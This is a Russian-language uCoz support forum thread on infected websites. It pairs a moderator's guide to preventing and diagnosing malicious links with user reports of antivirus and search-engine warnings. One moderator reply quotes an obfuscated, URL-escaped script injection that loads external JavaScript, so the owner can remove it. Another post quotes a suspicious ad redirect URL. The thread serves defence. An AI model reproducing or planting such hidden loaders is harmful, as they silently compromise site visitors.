Вирусы на сайтах
|
|
Сообщение # 1 |
22:08:04
21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров - Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1) на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
Сообщение от Модератор форума
|
Anglerdima
Сообщений: 133
Сообщение # 1801 |
22:01:27
25 Май 2015
Сообщение отредактировал Anglerdima - Понедельник, 25 Май 2015, 22:02:03
|
webanet
Сообщений: 24067
Сообщение # 1802 |
22:14:20
25 Май 2015
Anglerdima, не стоит отключать проксирование. и на будущее. не связывайтесь с бесплатными доменами
|
KETO
Сообщений: 36
Сообщение # 1803 |
22:14:30
25 Май 2015
c утра не могу попасть в админ панель своего сайта staffbull.info расположен на s7
вот скрин того, что выдается на экран
|
$Vladimir$
Сообщений: 7465
Сообщение # 1804 |
08:39:53
27 Май 2015
KETO, попробуйте воспользоваться другим браузером.
|
4yGON
Сообщений: 2
Сообщение # 1805 |
18:51:33
30 Май 2015
webanet, malegame.ru вирус?
|
webanet
Сообщений: 24067
Сообщение # 1806 |
20:25:33
30 Май 2015
4yGON, нет. не вирус. скорее всего реакция на редирект по ссылке скачать зайдите в вебмастер яндекса - безопасность - посмотрите список урлов и вердикт. если вердикт поведенческий - это именно то о чем я. писать в тех.поддержку яндекса
|
wot8994
Сообщений: 3
Сообщение # 1807 |
17:10:15
06 Июн 2015
Яндекс определил эту страницу как опасную. Дело в том что я не создавал эту страницу и понятия не имею как от неё избавиться. Помогите пожалуйста. http://wot-mods.ucoz.ru/news/2013-04-13
|
webanet
Сообщений: 24067
Сообщение # 1808 |
17:41:19
06 Июн 2015
wot8994, вам со всех страниц сайта надо удалить скрипт Код <script type="text/javascript"> <!-- document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A%64% 6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61 %73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%76%61%74%61%72%69%61%2D%76%6B%6F%6E%74%61%6B%74%65%2E%72%75%2F%6A%73%2F%73%6 9%74%65%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%29%3B%0A%2F%2F%2D%2D%3E%0A%3C%2F%73%63%72%69%70%74%3E')); //--> </script>
|
victor8704
Сообщений: 9
Сообщение # 1809 |
00:53:07
07 Июн 2015
При открытии сайта выскакивает на новой странице реклама MEGOGO.NET. Понимаю что это вирус, как избавиться??? Спасибо за помощь!!!
|
Irina_M
Сообщений: 603
Сообщение # 1810 |
10:34:46
08 Июн 2015
victor8704, уточните, пожалуйста, адрес проблемного сайта.
|
prommaterials
Сообщений: 288
Сообщение # 1811 |
11:07:36
08 Июн 2015
Добрый день!Два сайта: http://morskoyris.narod.ru и http://sivokoz-kuzma.narod.ru/ В субботу и воскресенье не заходил на сайты. Сегодня, в понедельник, браузер Опера сообщает, что мои сайты - мошеннические. С сайтами в последнее время никаких работ не производилось. Снова криворукие разработчики юкозовские что-то напортачили? Вы их не пускайте на работу по пятницам. Браузер полностью блокирует сайты и открывает лишь после нажатия кнопки "игнорировать предупреждение".
Уважаемая поддержка, подскажите, пожалуйста, в чём может быть проблема и что делать теперь?
Дополнение: СЕМЬ часов прошло от времени этого сообщения. Кто-то тут жив из поддержки Юкоза? Спасибо за оперативность, *censored* поддержка.. (((
Сообщение отредактировал prommaterials - Понедельник, 08 Июн 2015, 18:35:39
Сообщение от prommaterials
|
didicgami
Сообщений: 11
Сообщение # 1812 |
08:43:47
09 Июн 2015
Подскажите пожалуйста, в поддержке гугл написали, что на моём сайте находится вредоносный код, редирект на другой сайт. И сказали, что эта ссылка опасна, она и делает редирект: Код http://srv1.make-conversions1.com/srv/display/index_light.php?id=1895&pub_id=2007&pecr=1&p7=1678b==AO4AjMwQjN3ETO0czM2czNzMDN2fe66&p8=b8386==AOwYjM5b184&p4=&p5=7093f==QM2ITMd29ef&cmp_id=2608&cpm=0.5&psrv=srv20,%20http://srv1.make-conversions1.com/srv/display/reset.css,%20http://srv1.make-conversions1.com/tags/?tid=138&hash=6xxrjl&width=320&height=50&campaign_id=1261&media_id=BIDDER_ID&placement_id=2&p5=1261, Но найти её на страницах своего сайта я так и не смог. Помогите определить вредоносный код. Мой сайт: http://os.moy.su/
|
webanet
Сообщений: 24067
Сообщение # 1813 |
10:40:10
09 Июн 2015
prommaterials, Цитата Снова криворукие разработчики юкозовские что-то напортачили? sad Вы их не пускайте на работу по пятницам. можно чуть культурнее и тише, особенно не разобравшись в проблеме фильтра безопасности от яндекса и гугла на ваших сайтах нет. это самое главное. а угадывать какая версия оперы у вас по вашему скриншоту и какую базу она использует нет желания
|
webanet
Сообщений: 24067
Сообщение # 1814 |
10:40:34
09 Июн 2015
didicgami, рекламу юкоз отключите
|
didicgami
Сообщений: 11
Сообщение # 1815 |
13:24:48
09 Июн 2015
webanet, то есть мой сайт признали вредоносным из-за стандартной Ucozовской рекламы? Это нормально?
|